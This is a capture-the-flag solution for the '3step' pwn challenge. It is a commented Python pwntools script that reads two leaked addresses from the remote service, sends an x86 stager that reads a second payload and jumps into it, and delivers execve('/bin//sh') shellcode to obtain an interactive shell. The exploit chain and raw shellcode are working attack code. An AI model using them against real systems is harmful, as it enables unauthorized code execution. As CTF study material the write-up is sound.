3step
[pwn]
3step
Gonna have to get crafty with this one.
nc chal.tuctf.com 30504
Code
from pwn import *
# Solution script for the "3step" pwn challenge. It is Python 2 only (print
# statements, byte strings held in str) and relies on the pwntools star import
# above for remote()/process() and, presumably, for `struct` as well -- no
# explicit `import struct` is visible here.
#
# NOTE(review): the chain below depends on two properties of the target that a
# hardened build would not have: the service prints two raw addresses on
# connect, and the memory at those addresses is presumably both writable and
# executable. Non-executable data/stack pages (NX / W^X) and not disclosing
# addresses would each break it -- confirm against the binary's protections.

# Second-stage payload: 28 bytes of 32-bit x86 Linux machine code that issues
# execve("/bin//sh", NULL, NULL) through int 0x80, followed by the exit syscall.
shellcode = "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"
# Print the payload size as a sanity check.
print len(shellcode)
# Local-process variant, left disabled in favour of the remote service.
#c = process("./3step")
c = remote("chal.tuctf.com", 30504)
# Skip the banner, which ends with "snacks\n".
c.readuntil("snacks\n")
# The next two lines are parsed as integers; base 0 lets int() honour a "0x"
# prefix. The names suggest a .bss address and a stack address, but what they
# really point at is only visible in the binary -- TODO confirm.
addr_bss = int(c.readuntil("\n").strip("\n"), 0)
addr_stack = int(c.readuntil("\n\n").strip("\n"), 0)
# First-stage stager (17 bytes once assembled):
#   xor eax,eax ; xor ebx,ebx ; mov al,3 ; mov ecx,<addr_stack>
#   mov dl,0xff ; int 0x80 ; jmp ecx
# i.e. read(0, addr_stack, edx) and then jump to the buffer just filled.
# NOTE(review): only dl is set, so the read length is 0xff only if the upper
# bytes of edx happen to be zero at that point -- verify in a debugger.
stager = "\x31\xc0\x31\xdb\xb0\x03\xb9"
# Leaked address embedded as a little-endian 32-bit immediate.
stager += struct.pack("<L", addr_stack)
stager += "\xb2\xff\xcd\x80\xff\xe1"
# Echo both leaked addresses for the operator.
print "BSS : %08x" % (addr_bss)
print "STACK: %08x" % (addr_stack)
# Step 1: deliver the stager. Presumably the service stores this input at
# addr_bss, since that address is what step 3 sends -- TODO confirm.
c.readuntil("Step 1: ")
c.send(stager)
# Step 2: filler input; only the prompt has to be consumed.
c.readuntil("Step 2: ")
c.send("X\n")
# Step 3: send addr_bss as a little-endian 32-bit value. Presumably the
# service uses this value as a control-flow target, which starts the stager.
c.readuntil("Step 3: ")
c.send(struct.pack("<L", addr_bss))
# The stager's read() on fd 0 picks these bytes up from the same connection.
c.send(shellcode)
# Hand the socket over to the terminal for interactive use.
c.interactive()